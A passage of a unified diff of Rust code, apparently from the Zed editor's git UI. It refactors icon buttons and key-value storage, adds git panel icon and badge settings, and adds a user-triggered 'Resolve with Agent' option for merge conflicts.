.on_click(
move |_, window, cx| {
CommitView::open(
@@ -524,10 +524,11 @@ impl CommitView {
.when(self.stash.is_none(), |this| {
this.child(
Button::new("sha", "Commit SHA")
- .icon(copy_icon)
- .icon_color(copy_icon_color)
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::Small)
+ .start_icon(
+ Icon::new(copy_icon)
+ .size(IconSize::Small)
+ .color(copy_icon_color),
+ )
.tooltip({
let commit_sha = commit_sha.clone();
move |_, cx| {
@@ -1,3 +1,4 @@
+use agent_settings::AgentSettings;
use collections::{HashMap, HashSet};
use editor::{
ConflictsOurs, ConflictsOursMarker, ConflictsOuter, ConflictsTheirs, ConflictsTheirsMarker,
@@ -5,14 +6,22 @@ use editor::{
display_map::{BlockContext, BlockPlacement, BlockProperties, BlockStyle, CustomBlockId},
};
use gpui::{
- App, Context, Entity, InteractiveElement as _, ParentElement as _, Subscription, Task,
- WeakEntity,
+ App, Context, DismissEvent, Entity, InteractiveElement as _, ParentElement as _, Subscription,
+ Task, WeakEntity,
};
use language::{Anchor, Buffer, BufferId};
-use project::{ConflictRegion, ConflictSet, ConflictSetUpdate, ProjectItem as _};
-use std::{ops::Range, sync::Arc};
-use ui::{ActiveTheme, Element as _, Styled, Window, prelude::*};
+use project::{
+ ConflictRegion, ConflictSet, ConflictSetUpdate, Project, ProjectItem as _,
+ git_store::{GitStoreEvent, RepositoryEvent},
+};
+use settings::Settings;
+use std::{cell::RefCell, ops::Range, rc::Rc, sync::Arc};
+use ui::{ActiveTheme, Divider, Element as _, Styled, Window, prelude::*};
use util::{ResultExt as _, debug_panic, maybe};
+use workspace::{Workspace, notifications::simple_message_notification::MessageNotification};
+use zed_actions::agent::{
+ ConflictContent, ResolveConflictedFilesWithAgent, ResolveConflictsWithAgent,
+};
pub(crate) struct ConflictAddon {
buffers: HashMap<BufferId, BufferConflicts>,
@@ -368,11 +377,12 @@ fn render_conflict_buttons(
editor: WeakEntity<Editor>,
cx: &mut BlockContext,
) -> AnyElement {
+ let is_ai_enabled = AgentSettings::get_global(cx).enabled(cx);
+
h_flex()
.id(cx.block_id)
.h(cx.line_height)
.ml(cx.margins.gutter.width)
- .items_end()
.gap_1()
.bg(cx.theme().colors().editor_background)
.child(
@@ -419,6 +429,7 @@ fn render_conflict_buttons(
Button::new("both", "Use Both")
.label_size(LabelSize::Small)
.on_click({
+ let editor = editor.clone();
let conflict = conflict.clone();
let ours = conflict.ours.clone();
let theirs = conflict.theirs.clone();
@@ -435,9 +446,147 @@ fn render_conflict_buttons(
}
}),
)
+ .when(is_ai_enabled, |this| {
+ this.child(Divider::vertical()).child(
+ Button::new("resolve-with-agent", "Resolve with Agent")
+ .label_size(LabelSize::Small)
+ .start_icon(
+ Icon::new(IconName::ZedAssistant)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
+ .on_click({
+ let conflict = conflict.clone();
+ move |_, window, cx| {
+ let content = editor
+ .update(cx, |editor, cx| {
+ let multibuffer = editor.buffer().read(cx);
+ let buffer_id = conflict.ours.end.buffer_id?;
+ let buffer = multibuffer.buffer(buffer_id)?;
+ let buffer_read = buffer.read(cx);
+ let snapshot = buffer_read.snapshot();
+ let conflict_text = snapshot
+ .text_for_range(conflict.range.clone())
+ .collect::<String>();
+ let file_path = buffer_read
+ .file()
+ .and_then(|file| file.as_local())
+ .map(|f| f.abs_path(cx).to_string_lossy().to_string())
+ .unwrap_or_default();
+ Some(ConflictContent {
+ file_path,
+ conflict_text,
+ ours_branch_name: conflict.ours_branch_name.to_string(),
+ theirs_branch_name: conflict.theirs_branch_name.to_string(),
+ })
+ })
+ .ok()
+ .flatten();
+ if let Some(content) = content {
+ window.dispatch_action(
+ Box::new(ResolveConflictsWithAgent {
+ conflicts: vec![content],
+ }),
+ cx,
+ );
+ }
+ }
+ }),
+ )
+ })
.into_any()
}
+fn collect_conflicted_file_paths(project: &Project, cx: &App) -> Vec<String> {
+ let git_store = project.git_store().read(cx);
+ let mut paths = Vec::new();
+
+ for repo in git_store.repositories().values() {
+ let snapshot = repo.read(cx).snapshot();
+ for (repo_path, _) in snapshot.merge.merge_heads_by_conflicted_path.iter() {
+ if let Some(project_path) = repo.read(cx).repo_path_to_project_path(repo_path, cx) {
+ paths.push(
+ project_path
+ .path
+ .as_std_path()
+ .to_string_lossy()
+ .to_string(),
+ );
+ }
+ }
+ }
+
+ paths
+}
+
+pub(crate) fn register_conflict_notification(
+ workspace: &mut Workspace,
+ cx: &mut Context<Workspace>,
+) {
+ let git_store = workspace.project().read(cx).git_store().clone();
+
+ let last_shown_paths: Rc<RefCell<HashSet<String>>> = Rc::new(RefCell::new(HashSet::default()));
+
+ cx.subscribe(&git_store, move |workspace, _git_store, event, cx| {
+ let conflicts_changed = matches!(
+ event,
+ GitStoreEvent::ConflictsUpdated
+ | GitStoreEvent::RepositoryUpdated(_, RepositoryEvent::StatusesChanged, _)
+ );
+ if !AgentSettings::get_global(cx).enabled(cx) || !conflicts_changed {
+ return;
+ }
+ let project = workspace.project().read(cx);
+ if project.is_via_collab() {
+ return;
+ }
+
+ if workspace.is_notification_suppressed(workspace::merge_conflict_notification_id()) {
+ return;
+ }
+
+ let paths = collect_conflicted_file_paths(project, cx);
+ let notification_id = workspace::merge_conflict_notification_id();
+ let current_paths_set: HashSet<String> = paths.iter().cloned().collect();
+
+ if paths.is_empty() {
+ last_shown_paths.borrow_mut().clear();
+ workspace.dismiss_notification(¬ification_id, cx);
+ } else if *last_shown_paths.borrow() != current_paths_set {
+ // Only show the notification if the set of conflicted paths has changed.
+ // This prevents re-showing after the user dismisses it while working on the same conflicts.
+ *last_shown_paths.borrow_mut() = current_paths_set;
+ let file_count = paths.len();
+ workspace.show_notification(notification_id, cx, |cx| {
+ cx.new(|cx| {
+ let message = format!(
+ "{file_count} file{} have unresolved merge conflicts",
+ if file_count == 1 { "" } else { "s" }
+ );
+
+ MessageNotification::new(message, cx)
+ .primary_message("Resolve with Agent")
+ .primary_icon(IconName::ZedAssistant)
+ .primary_icon_color(Color::Muted)
+ .primary_on_click({
+ let paths = paths.clone();
+ move |window, cx| {
+ window.dispatch_action(
+ Box::new(ResolveConflictedFilesWithAgent {
+ conflicted_file_paths: paths.clone(),
+ }),
+ cx,
+ );
+ cx.emit(DismissEvent);
+ }
+ })
+ })
+ });
+ }
+ })
+ .detach();
+}
+
pub(crate) fn resolve_conflict(
editor: WeakEntity<Editor>,
excerpt_id: ExcerptId,
@@ -6,9 +6,9 @@ use editor::{Editor, EditorEvent, MultiBuffer};
use futures::{FutureExt, select_biased};
use gpui::{
AnyElement, App, AppContext as _, AsyncApp, Context, Entity, EventEmitter, FocusHandle,
- Focusable, IntoElement, Render, Task, WeakEntity, Window,
+ Focusable, Font, IntoElement, Render, Task, WeakEntity, Window,
};
-use language::{Buffer, LanguageRegistry};
+use language::{Buffer, HighlightedText, LanguageRegistry};
use project::Project;
use std::{
any::{Any, TypeId},
@@ -21,7 +21,7 @@ use ui::{Color, Icon, IconName, Label, LabelCommon as _, SharedString};
use util::paths::PathExt as _;
use workspace::{
Item, ItemHandle as _, ItemNavHistory, ToolbarItemLocation, Workspace,
- item::{BreadcrumbText, ItemEvent, SaveOptions, TabContentParams},
+ item::{ItemEvent, SaveOptions, TabContentParams},
searchable::SearchableItemHandle,
};
@@ -108,7 +108,7 @@ impl FileDiffView {
for buffer in [&old_buffer, &new_buffer] {
cx.subscribe(buffer, move |this, _, event, _| match event {
- language::BufferEvent::Edited
+ language::BufferEvent::Edited { .. }
| language::BufferEvent::LanguageChanged(_)
| language::BufferEvent::Reparsed => {
this.buffer_changes_tx.send(()).ok();
@@ -324,7 +324,7 @@ impl Item for FileDiffView {
ToolbarItemLocation::PrimaryLeft
}
- fn breadcrumbs(&self, cx: &App) -> Option<Vec<BreadcrumbText>> {
+ fn breadcrumbs(&self, cx: &App) -> Option<(Vec<HighlightedText>, Option<Font>)> {
self.editor.breadcrumbs(cx)
}
@@ -429,10 +429,11 @@ impl Render for FileHistoryView {
Button::new("load-more", "Load More")
.disabled(self.loading_more)
.label_size(LabelSize::Small)
- .icon(IconName::ArrowCircle)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::Start)
+ .start_icon(
+ Icon::new(IconName::ArrowCircle)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(cx.listener(|this, _, window, cx| {
this.load_more(window, cx);
})),
@@ -565,7 +566,10 @@ impl Item for FileHistoryView {
false
}
- fn breadcrumbs(&self, _cx: &App) -> Option<Vec<workspace::item::BreadcrumbText>> {
+ fn breadcrumbs(
+ &self,
+ _cx: &App,
+ ) -> Option<(Vec<workspace::item::HighlightedText>, Option<gpui::Font>)> {
None
}
@@ -14,12 +14,13 @@ use anyhow::Context as _;
use askpass::AskPassDelegate;
use cloud_llm_client::CompletionIntent;
use collections::{BTreeMap, HashMap, HashSet};
-use db::kvp::KEY_VALUE_STORE;
+use db::kvp::KeyValueStore;
use editor::{
Direction, Editor, EditorElement, EditorMode, MultiBuffer, MultiBufferOffset,
actions::ExpandAllDiffHunks,
};
use editor::{EditorStyle, RewrapOptions};
+use file_icons::FileIcons;
use futures::StreamExt as _;
use git::commit::ParsedCommitMessage;
use git::repository::{
@@ -714,11 +715,16 @@ impl GitPanel {
let mut was_sort_by_path = GitPanelSettings::get_global(cx).sort_by_path;
let mut was_tree_view = GitPanelSettings::get_global(cx).tree_view;
+ let mut was_file_icons = GitPanelSettings::get_global(cx).file_icons;
+ let mut was_folder_icons = GitPanelSettings::get_global(cx).folder_icons;
let mut was_diff_stats = GitPanelSettings::get_global(cx).diff_stats;
cx.observe_global_in::<SettingsStore>(window, move |this, window, cx| {
- let sort_by_path = GitPanelSettings::get_global(cx).sort_by_path;
- let tree_view = GitPanelSettings::get_global(cx).tree_view;
- let diff_stats = GitPanelSettings::get_global(cx).diff_stats;
+ let settings = GitPanelSettings::get_global(cx);
+ let sort_by_path = settings.sort_by_path;
+ let tree_view = settings.tree_view;
+ let file_icons = settings.file_icons;
+ let folder_icons = settings.folder_icons;
+ let diff_stats = settings.diff_stats;
if tree_view != was_tree_view {
this.view_mode = GitPanelViewMode::from_settings(cx);
}
@@ -731,12 +737,22 @@ impl GitPanel {
if (diff_stats != was_diff_stats) || update_entries {
this.update_visible_entries(window, cx);
}
+ if file_icons != was_file_icons || folder_icons != was_folder_icons {
+ cx.notify();
+ }
was_sort_by_path = sort_by_path;
was_tree_view = tree_view;
+ was_file_icons = file_icons;
+ was_folder_icons = folder_icons;
was_diff_stats = diff_stats;
})
.detach();
+ cx.observe_global::<FileIcons>(|_, cx| {
+ cx.notify();
+ })
+ .detach();
+
// just to let us render a placeholder editor.
// Once the active git repo is set, this buffer will be replaced.
let temporary_buffer = cx.new(|cx| Buffer::local("", cx));
@@ -912,6 +928,7 @@ impl GitPanel {
let width = self.width;
let amend_pending = self.amend_pending;
let signoff_enabled = self.signoff_enabled;
+ let kvp = KeyValueStore::global(cx);
self.pending_serialization = cx.spawn(async move |git_panel, cx| {
cx.background_executor()
@@ -932,16 +949,15 @@ impl GitPanel {
};
cx.background_spawn(
async move {
- KEY_VALUE_STORE
- .write_kvp(
- serialization_key,
- serde_json::to_string(&SerializedGitPanel {
- width,
- amend_pending,
- signoff_enabled,
- })?,
- )
- .await?;
+ kvp.write_kvp(
+ serialization_key,
+ serde_json::to_string(&SerializedGitPanel {
+ width,
+ amend_pending,
+ signoff_enabled,
+ })?,
+ )
+ .await?;
anyhow::Ok(())
}
.log_err(),
@@ -1117,7 +1133,22 @@ impl GitPanel {
}
if matches!(self.entries.get(new_index), Some(GitListEntry::Header(..))) {
- self.selected_entry = Some(new_index.saturating_sub(1));
+ self.selected_entry = match &self.view_mode {
+ GitPanelViewMode::Flat => Some(new_index.saturating_sub(1)),
+ GitPanelViewMode::Tree(tree_view_state) => {
+ maybe!({
+ let current_logical_index = tree_view_state
+ .logical_indices
+ .iter()
+ .position(|&i| i == new_index)?;
+
+ tree_view_state
+ .logical_indices
+ .get(current_logical_index.saturating_sub(1))
+ .copied()
+ })
+ }
+ };
} else {
self.selected_entry = Some(new_index);
}
@@ -2245,6 +2276,7 @@ impl GitPanel {
RewrapOptions {
override_language_settings: false,
preserve_existing_whitespace: true,
+ line_length: None,
},
cx,
);
@@ -5020,15 +5052,21 @@ impl GitPanel {
window: &Window,
cx: &Context<Self>,
) -> AnyElement {
- let tree_view = GitPanelSettings::get_global(cx).tree_view;
+ let settings = GitPanelSettings::get_global(cx);
+ let tree_view = settings.tree_view;
let path_style = self.project.read(cx).path_style(cx);
let git_path_style = ProjectSettings::get_global(cx).git.path_style;
let display_name = entry.display_name(path_style);
let selected = self.selected_entry == Some(ix);
let marked = self.marked_entries.contains(&ix);
- let status_style = GitPanelSettings::get_global(cx).status_style;
+ let status_style = settings.status_style;
let status = entry.status;
+ let file_icon = if settings.file_icons {
+ FileIcons::get_icon(entry.repo_path.as_std_path(), cx)
+ } else {
+ None
+ };
let has_conflict = status.is_conflicted();
let is_modified = status.is_modified();
@@ -5105,6 +5143,21 @@ impl GitPanel {
.min_w_0()
.flex_1()
.gap_1()
+ .when(settings.file_icons, |this| {
+ this.child(
+ file_icon
+ .map(|file_icon| {
+ Icon::from_path(file_icon)
+ .size(IconSize::Small)
+ .color(Color::Muted)
+ })
+ .unwrap_or_else(|| {
+ Icon::new(IconName::File)
+ .size(IconSize::Small)
+ .color(Color::Muted)
+ }),
+ )
+ })
.child(git_status_icon(status))
.map(|this| {
if tree_view {
@@ -5273,10 +5326,24 @@ impl GitPanel {
)
};
- let folder_icon = if entry.expanded {
- IconName::FolderOpen
+ let settings = GitPanelSettings::get_global(cx);
+ let folder_icon = if settings.folder_icons {
+ FileIcons::get_folder_icon(entry.expanded, entry.key.path.as_std_path(), cx)
+ } else {
+ FileIcons::get_chevron_icon(entry.expanded, cx)
+ };
+ let fallback_folder_icon = if settings.folder_icons {
+ if entry.expanded {
+ IconName::FolderOpen
+ } else {
+ IconName::Folder
+ }
} else {
- IconName::Folder
+ if entry.expanded {
+ IconName::ChevronDown
+ } else {
+ IconName::ChevronRight
+ }
};
let stage_status = if let Some(repo) = &self.active_repository {
@@ -5299,9 +5366,17 @@ impl GitPanel {
.gap_1()
.pl(px(entry.depth as f32 * TREE_INDENT))
.child(
- Icon::new(folder_icon)
- .size(IconSize::Small)
- .color(Color::Muted),
+ folder_icon
+ .map(|folder_icon| {
+ Icon::from_path(folder_icon)
+ .size(IconSize::Small)
+ .color(Color::Muted)
+ })
+ .unwrap_or_else(|| {
+ Icon::new(fallback_folder_icon)
+ .size(IconSize::Small)
+ .color(Color::Muted)
+ }),
)
.child(self.entry_label(entry.name.clone(), label_color).truncate());
@@ -5468,12 +5543,14 @@ impl GitPanel {
mut cx: AsyncWindowContext,
) -> anyhow::Result<Entity<Self>> {
let serialized_panel = match workspace
- .read_with(&cx, |workspace, _| Self::serialization_key(workspace))
+ .read_with(&cx, |workspace, cx| {
+ Self::serialization_key(workspace).map(|key| (key, KeyValueStore::global(cx)))
+ })
.ok()
.flatten()
{
- Some(serialization_key) => cx
- .background_spawn(async move { KEY_VALUE_STORE.read_kvp(&serialization_key) })
+ Some((serialization_key, kvp)) => cx
+ .background_spawn(async move { kvp.read_kvp(&serialization_key) })
.await
.context("loading git panel")
.log_err()
@@ -5738,10 +5815,22 @@ impl Panel for GitPanel {
Some("Git Panel")
}
+ fn icon_label(&self, _: &Window, cx: &App) -> Option<String> {
+ if !GitPanelSettings::get_global(cx).show_count_badge {
+ return None;
+ }
+ let total = self.changes_count;
+ (total > 0).then(|| total.to_string())
+ }
+
fn toggle_action(&self) -> Box<dyn Action> {
Box::new(ToggleFocus)
}
+ fn starts_open(&self, _: &Window, cx: &App) -> bool {
+ GitPanelSettings::get_global(cx).starts_open
+ }
+
fn activation_priority(&self) -> u32 {
2
}
@@ -20,12 +20,16 @@ pub struct GitPanelSettings {
pub dock: DockPosition,
pub default_width: Pixels,
pub status_style: StatusStyle,
+ pub file_icons: bool,
+ pub folder_icons: bool,
pub scrollbar: ScrollbarSettings,
pub fallback_branch_name: String,
pub sort_by_path: bool,
pub collapse_untracked_diff: bool,
pub tree_view: bool,
pub diff_stats: bool,
+ pub show_count_badge: bool,
+ pub starts_open: bool,
}
impl ScrollbarVisibility for GitPanelSettings {
@@ -52,6 +56,8 @@ impl Settings for GitPanelSettings {
dock: git_panel.dock.unwrap().into(),
default_width: px(git_panel.default_width.unwrap()),
status_style: git_panel.status_style.unwrap(),
+ file_icons: git_panel.file_icons.unwrap(),
+ folder_icons: git_panel.folder_icons.unwrap(),
scrollbar: ScrollbarSettings {
show: git_panel.scrollbar.unwrap().show.map(Into::into),
},
@@ -60,6 +66,8 @@ impl Settings for GitPanelSettings {
collapse_untracked_diff: git_panel.collapse_untracked_diff.unwrap(),
tree_view: git_panel.tree_view.unwrap(),
diff_stats: git_panel.diff_stats.unwrap(),
+ show_count_badge: git_panel.show_count_badge.unwrap(),
+ starts_open: git_panel.starts_open.unwrap(),
}
}
}
@@ -25,8 +25,8 @@ actions!(
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)]
pub enum GitPickerTab {
- Branches,
Worktrees,
+ Branches,
Stash,
}
@@ -190,9 +190,9 @@ impl GitPicker {
fn activate_next_tab(&mut self, window: &mut Window, cx: &mut Context<Self>) {
self.tab = match self.tab {
- GitPickerTab::Branches => GitPickerTab::Worktrees,
- GitPickerTab::Worktrees => GitPickerTab::Stash,
- GitPickerTab::Stash => GitPickerTab::Branches,
+ GitPickerTab::Worktrees => GitPickerTab::Branches,
+ GitPickerTab::Branches => GitPickerTab::Stash,
+ GitPickerTab::Stash => GitPickerTab::Worktrees,
};
self.ensure_active_picker(window, cx);
self.focus_active_picker(window, cx);
@@ -201,9 +201,9 @@ impl GitPicker {
fn activate_previous_tab(&mut self, window: &mut Window, cx: &mut Context<Self>) {
self.tab = match self.tab {
- GitPickerTab::Branches => GitPickerTab::Stash,
- GitPickerTab::Worktrees => GitPickerTab::Branches,
- GitPickerTab::Stash => GitPickerTab::Worktrees,
+ GitPickerTab::Worktrees => GitPickerTab::Stash,
+ GitPickerTab::Branches => GitPickerTab::Worktrees,
+ GitPickerTab::Stash => GitPickerTab::Branches,
};
self.ensure_active_picker(window, cx);
self.focus_active_picker(window, cx);
@@ -241,9 +241,9 @@ impl GitPicker {
"git-picker-tabs",
[
ToggleButtonSimple::new(
- GitPickerTab::Branches.to_string(),
+ GitPickerTab::Worktrees.to_string(),
cx.listener(|this, _, window, cx| {
- this.tab = GitPickerTab::Branches;
+ this.tab = GitPickerTab::Worktrees;
this.ensure_active_picker(window, cx);
this.focus_active_picker(window, cx);
cx.notify();
@@ -251,16 +251,16 @@ impl GitPicker {
)
.tooltip(move |_, cx| {
Tooltip::for_action_in(
- "Toggle Branch Picker",
- &ActivateBranchesTab,
- &branches_focus_handle,
+ "Toggle Worktree Picker",
+ &ActivateWorktreesTab,
+ &worktrees_focus_handle,
cx,
)
}),
ToggleButtonSimple::new(
- GitPickerTab::Worktrees.to_string(),
+ GitPickerTab::Branches.to_string(),
cx.listener(|this, _, window, cx| {
- this.tab = GitPickerTab::Worktrees;
+ this.tab = GitPickerTab::Branches;
this.ensure_active_picker(window, cx);
this.focus_active_picker(window, cx);
cx.notify();
@@ -268,9 +268,9 @@ impl GitPicker {
)
.tooltip(move |_, cx| {
Tooltip::for_action_in(
- "Toggle Worktree Picker",
- &ActivateWorktreesTab,
- &worktrees_focus_handle,
+ "Toggle Branch Picker",
+ &ActivateBranchesTab,
+ &branches_focus_handle,
cx,
)
}),
@@ -297,8 +297,8 @@ impl GitPicker {
.style(ToggleButtonGroupStyle::Outlined)
.auto_width()
.selected_index(match self.tab {
- GitPickerTab::Branches => 0,
- GitPickerTab::Worktrees => 1,
+ GitPickerTab::Worktrees => 0,
+ GitPickerTab::Branches => 1,
GitPickerTab::Stash => 2,
}),
)
@@ -62,6 +62,7 @@ pub fn init(cx: &mut App) {
git_panel::register(workspace);
repository_selector::register(workspace);
git_picker::register(workspace);
+ conflict_view::register_conflict_notification(workspace, cx);
let project = workspace.project().read(cx);
if project.is_read_only(cx) {
@@ -294,11 +295,12 @@ pub fn resolve_active_repository(workspace: &Workspace, cx: &App) -> Option<Enti
git_store
.repositories()
.values()
- .find(|repo| {
+ .filter(|repo| {
let repo_path = &repo.read(cx).work_directory_abs_path;
*repo_path == worktree_abs_path
|| worktree_abs_path.starts_with(repo_path.as_ref())
})
+ .max_by_key(|repo| repo.read(cx).work_directory_abs_path.as_os_str().len())
.cloned()
})
})
@@ -871,8 +873,7 @@ impl Render for GitCloneModal {
.child(
Button::new("learn-more", "Learn More")
.label_size(LabelSize::Small)
- .icon(IconName::ArrowUpRight)
- .icon_size(IconSize::XSmall)
+ .end_icon(Icon::new(IconName::ArrowUpRight).size(IconSize::XSmall))
.on_click(|_, _, cx| {
cx.open_url("https://github.com/git-guides/git-clone");
}),
@@ -3,9 +3,9 @@ use buffer_diff::BufferDiff;
use editor::{Editor, EditorEvent, MultiBuffer, multibuffer_context_lines};
use gpui::{
AnyElement, App, AppContext as _, AsyncApp, Context, Entity, EventEmitter, FocusHandle,
- Focusable, IntoElement, Render, SharedString, Task, Window,
+ Focusable, Font, IntoElement, Render, SharedString, Task, Window,
};
-use language::{Buffer, Capability, OffsetRangeExt};
+use language::{Buffer, Capability, HighlightedText, OffsetRangeExt};
use multi_buffer::PathKey;
use project::Project;
use std::{
@@ -18,7 +18,7 @@ use util::paths::PathStyle;
use util::rel_path::RelPath;
use workspace::{
Item, ItemHandle as _, ItemNavHistory, ToolbarItemLocation, Workspace,
- item::{BreadcrumbText, ItemEvent, SaveOptions, TabContentParams},
+ item::{ItemEvent, SaveOptions, TabContentParams},
searchable::SearchableItemHandle,
};
@@ -338,7 +338,7 @@ impl Item for MultiDiffView {
ToolbarItemLocation::PrimaryLeft
}
- fn breadcrumbs(&self, cx: &App) -> Option<Vec<BreadcrumbText>> {
+ fn breadcrumbs(&self, cx: &App) -> Option<(Vec<HighlightedText>, Option<Font>)> {
self.editor.breadcrumbs(cx)
}
@@ -2,7 +2,6 @@ use crate::{
conflict_view::ConflictAddon,
git_panel::{GitPanel, GitPanelAddon, GitStatusEntry},
git_panel_settings::GitPanelSettings,
- remote_button::{render_publish_button, render_push_button},
resolve_active_repository,
};
use agent_settings::AgentSettings;
@@ -18,8 +17,7 @@ use editor::{
use git::repository::DiffType;
use git::{
- Commit, StageAll, StageAndNext, ToggleStaged, UnstageAll, UnstageAndNext,
- repository::{Branch, RepoPath, Upstream, UpstreamTracking, UpstreamTrackingStatus},
+ Commit, StageAll, StageAndNext, ToggleStaged, UnstageAll, UnstageAndNext, repository::RepoPath,
status::FileStatus,
};
use gpui::{
@@ -1221,8 +1219,9 @@ impl SerializableItem for ProjectDiff {
window: &mut Window,
cx: &mut App,
) -> Task<Result<Entity<Self>>> {
+ let db = persistence::ProjectDiffDb::global(cx);
window.spawn(cx, async move |cx| {
- let diff_base = persistence::PROJECT_DIFF_DB.get_diff_base(item_id, workspace_id)?;
+ let diff_base = db.get_diff_base(item_id, workspace_id)?;
let diff = cx.update(|window, cx| {
let branch_diff = cx
@@ -1248,10 +1247,10 @@ impl SerializableItem for ProjectDiff {
let workspace_id = workspace.database_id()?;
let diff_base = self.diff_base(cx).clone();
+ let db = persistence::ProjectDiffDb::global(cx);
Some(cx.background_spawn({
async move {
- persistence::PROJECT_DIFF_DB
- .save_diff_base(item_id, workspace_id, diff_base.clone())
+ db.save_diff_base(item_id, workspace_id, diff_base.clone())
.await
}
}))
@@ -1291,7 +1290,7 @@ mod persistence {
)];
}
- db::static_connection!(PROJECT_DIFF_DB, ProjectDiffDb, [WorkspaceDb]);
+ db::static_connection!(ProjectDiffDb, [WorkspaceDb]);
impl ProjectDiffDb {
pub async fn save_diff_base(
@@ -1594,8 +1593,11 @@ fn render_send_review_to_agent_button(review_count: usize, focus_handle: &FocusH
"send-review",
format!("Send Review to Agent ({})", review_count),
)
- .icon(IconName::ZedAssistant)
- .icon_position(IconPosition::Start)
+ .start_icon(
+ Icon::new(IconName::ZedAssistant)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.tooltip(Tooltip::for_action_title_in(
"Send all review comments to the Agent panel",
&SendReviewToAgent,
@@ -1688,10 +1690,11 @@ impl Render for BranchDiffToolbar {
let focus_handle = focus_handle.clone();
this.child(Divider::vertical()).child(
Button::new("review-diff", "Review Diff")
- .icon(IconName::ZedAssistant)
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
+ .start_icon(
+ Icon::new(IconName::ZedAssistant)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.key_binding(KeyBinding::for_action_in(&ReviewDiff, &focus_handle, cx))
.tooltip(move |_, cx| {
Tooltip::with_meta_in(
@@ -1719,254 +1722,6 @@ impl Render for BranchDiffToolbar {
}
}
-#[derive(IntoElement, RegisterComponent)]
-pub struct ProjectDiffEmptyState {
- pub no_repo: bool,
- pub can_push_and_pull: bool,
- pub focus_handle: Option<FocusHandle>,
- pub current_branch: Option<Branch>,
- // has_pending_commits: bool,
- // ahead_of_remote: bool,
- // no_git_repository: bool,
-}
-
-impl RenderOnce for ProjectDiffEmptyState {
- fn render(self, _window: &mut Window, cx: &mut App) -> impl IntoElement {
- let status_against_remote = |ahead_by: usize, behind_by: usize| -> bool {
- matches!(self.current_branch, Some(Branch {
- upstream:
- Some(Upstream {
- tracking:
- UpstreamTracking::Tracked(UpstreamTrackingStatus {
- ahead, behind, ..
- }),
- ..
- }),
- ..
- }) if (ahead > 0) == (ahead_by > 0) && (behind > 0) == (behind_by > 0))
- };
-
- let change_count = |current_branch: &Branch| -> (usize, usize) {
- match current_branch {
- Branch {
- upstream:
- Some(Upstream {
- tracking:
- UpstreamTracking::Tracked(UpstreamTrackingStatus {
- ahead, behind, ..
- }),
- ..
- }),
- ..
- } => (*ahead as usize, *behind as usize),
- _ => (0, 0),
- }
- };
-
- let not_ahead_or_behind = status_against_remote(0, 0);
- let ahead_of_remote = status_against_remote(1, 0);
- let branch_not_on_remote = if let Some(branch) = self.current_branch.as_ref() {
- branch.upstream.is_none()
- } else {
- false
- };
-
- let has_branch_container = |branch: &Branch| {
- h_flex()
- .max_w(px(420.))
- .bg(cx.theme().colors().text.opacity(0.05))
- .border_1()
- .border_color(cx.theme().colors().border)
- .rounded_sm()
- .gap_8()
- .px_6()
- .py_4()
- .map(|this| {
- if ahead_of_remote {
- let ahead_count = change_count(branch).0;
- let ahead_string = format!("{} Commits Ahead", ahead_count);
- this.child(
- v_flex()
- .child(Headline::new(ahead_string).size(HeadlineSize::Small))
- .child(
- Label::new(format!("Push your changes to {}", branch.name()))
- .color(Color::Muted),
- ),
- )
- .child(div().child(render_push_button(
- self.focus_handle,
- "push".into(),
- ahead_count as u32,
- )))
- } else if branch_not_on_remote {
- this.child(
- v_flex()
- .child(Headline::new("Publish Branch").size(HeadlineSize::Small))
- .child(
- Label::new(format!("Create {} on remote", branch.name()))
- .color(Color::Muted),
- ),
- )
- .child(
- div().child(render_publish_button(self.focus_handle, "publish".into())),
- )
- } else {
- this.child(Label::new("Remote status unknown").color(Color::Muted))
- }
- })
- };
-
- v_flex().size_full().items_center().justify_center().child(
- v_flex()
- .gap_1()
- .when(self.no_repo, |this| {
- this.text_center()
- .child(Label::new("No Repository").color(Color::Muted))
- .child(
- Button::new("initialize-repo", "Initialize Repository")
- .on_click(move |_, _, cx| cx.dispatch_action(&git::Init)),
- )
- })
- .map(|this| {
- if not_ahead_or_behind && self.current_branch.is_some() {
- this.text_center()
- .child(Label::new("No Changes").color(Color::Muted))
- } else {
- this.when_some(self.current_branch.as_ref(), |this, branch| {
- this.child(has_branch_container(branch))
- })
- }
- }),
- )
- }
-}
-
-mod preview {
- use git::repository::{
- Branch, CommitSummary, Upstream, UpstreamTracking, UpstreamTrackingStatus,
- };
- use ui::prelude::*;
-
- use super::ProjectDiffEmptyState;
-
- // View this component preview using `workspace: open component-preview`
- impl Component for ProjectDiffEmptyState {
- fn scope() -> ComponentScope {
- ComponentScope::VersionControl
- }
-
- fn preview(_window: &mut Window, _cx: &mut App) -> Option<AnyElement> {
- let unknown_upstream: Option<UpstreamTracking> = None;
- let ahead_of_upstream: Option<UpstreamTracking> = Some(
- UpstreamTrackingStatus {
- ahead: 2,
- behind: 0,
- }
- .into(),
- );
-
- let not_ahead_or_behind_upstream: Option<UpstreamTracking> = Some(
- UpstreamTrackingStatus {
- ahead: 0,
- behind: 0,
- }
- .into(),
- );
-
- fn branch(upstream: Option<UpstreamTracking>) -> Branch {
- Branch {
- is_head: true,
- ref_name: "some-branch".into(),
- upstream: upstream.map(|tracking| Upstream {
- ref_name: "origin/some-branch".into(),
- tracking,
- }),
- most_recent_commit: Some(CommitSummary {
- sha: "abc123".into(),
- subject: "Modify stuff".into(),
- commit_timestamp: 1710932954,
- author_name: "John Doe".into(),
- has_parent: true,
- }),
- }
- }
-
- let no_repo_state = ProjectDiffEmptyState {
- no_repo: true,
- can_push_and_pull: false,
- focus_handle: None,
- current_branch: None,
- };
-
- let no_changes_state = ProjectDiffEmptyState {
- no_repo: false,
- can_push_and_pull: true,
- focus_handle: None,
- current_branch: Some(branch(not_ahead_or_behind_upstream)),
- };
-
- let ahead_of_upstream_state = ProjectDiffEmptyState {
- no_repo: false,
- can_push_and_pull: true,
- focus_handle: None,
- current_branch: Some(branch(ahead_of_upstream)),
- };
-
- let unknown_upstream_state = ProjectDiffEmptyState {
- no_repo: false,
- can_push_and_pull: true,
- focus_handle: None,
- current_branch: Some(branch(unknown_upstream)),
- };
-
